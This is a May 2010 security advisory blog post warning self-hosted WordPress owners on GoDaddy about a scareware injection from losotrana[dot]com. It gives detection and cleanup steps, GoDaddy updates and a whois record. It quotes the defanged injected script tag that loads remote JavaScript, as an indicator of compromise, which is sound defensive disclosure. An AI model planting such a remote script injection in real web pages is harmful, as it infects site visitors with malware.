Reports of WordPress blogs self-hosted at GoDaddy.com and have been infected with the losotrana[dot]com/js.php on Monday, May 17, 2010 and Thursday, May 20, 2010.
Warning: This is dangerous malware! This scareware injection tries to infect your site visitor’s computer. If your visitors do not have an up-to-date anti-virus program running, their computers could get infected.
What You Should Do: If you have an up-to-date version of an anti-virus program running, such as *AVG, please check your website now to see if it redirects you! Note: If you receive a pop-up message to download anything, do NOT click “yes” or “okay.”
If you do not have an updated anti-virus program running, do not go to your website to check. Instead, log in to your site via FTP and look at the “Last Modified” column and see if your .php files all have the same date/time (either 5/16, 5/17 or 5/20/2010).
If your website is infected, put it in maintenance mode immediately so that you do not infect your visitors. Click here for instructions on how to put your site in maintenance mode – see Step 2)
Then clean your website completely and upload a fresh copy. Be sure to check for any suspicious .php files that you did not put on your website. There must be a “trigger” file that sets this infection off. Be sure to remove it!
- Viewing your site’s source code, you will see the following script injected on your pages:<script src=”http:// losotrana[dot]com/js.php”></script>
- Your site redirects you to a fake website that executes the threat that tries to download to visitors computers.
- A long string of base64_decode script is found at the top of all .php files.
- This threat has the same IP address as the holasionweb.com injection (126.96.36.199).
- Losotrana[dot]com has the same registrant as the other latest attacks and it shows that they have 203 other domains registered too. You can view the whois here, and I have copied it below for you as well.
Hilary Kneber firstname.lastname@example.org
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
Here’s a screen shot of the threat stopped by AVG on May 17, 2010
Here’s a screen shot of the threat stopped by AVG on May 20, 2010
We will continue to provide information as it becomes available. on this post. WPSecurityLock has contacted Go Daddy to report this latest attack. And we are now emailing MediaTemple as well.
UPDATE 5/17/2010 at 9:20am: We’re receiving reports from webmasters hosting at MediaTemple that their computers were infected and a virus has stolen their FTP passwords. Please make sure your computers are clean and that you change your FTP passwords immediately.
UPDATE 5/17/2010 at 9:58am: After further investigation, we now know that the sites hacked at MediaTemple are not related to this latest attack. They are an isolated incident and not related to the losotrana[dot].com/js.php script.
So far, the only verified reports of websites attacked with this issue are hosted at GoDaddy only.
UPDATE 5/17/2010 at 10am: We have received correspondence from Go Daddy’s Information Security Operations team. They are aware and working on this issue. They will be providing a statement very soon to give you an update.
UPDATE 5/20/2010 at 10am: We are receiving multiple reports that the lostrana[dot]com/js.php script is rearing its ugly head again today! Please keep an eye on your websites. Some are redirecting to http://webguardyourpc-33p[dot]net/…. (see screen shot above)
UPDATE 5/20/2010 at 5:15pm: Go Daddy is reaching out to our community and has provided the latest statment regarding today’s attacks:
Compromised Website Update 5/20/10
An attack impacting less than 200 accounts happened this morning.
Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Todd Redfoot, Chief Information Security Officer
We need your help….
This new losotrana[dot]com/js.php malware was just discovered this morning (May 17, 2010) thanks to reports from our community. Please help spread awareness and come together as a community. Be sure to Tweet this message and also add it to your Facebook. If you have any new information, please leave a comment below so we can all help each other.
* Denotes our Affiliate Link. If you a make a purchase through this link, we receive a commission.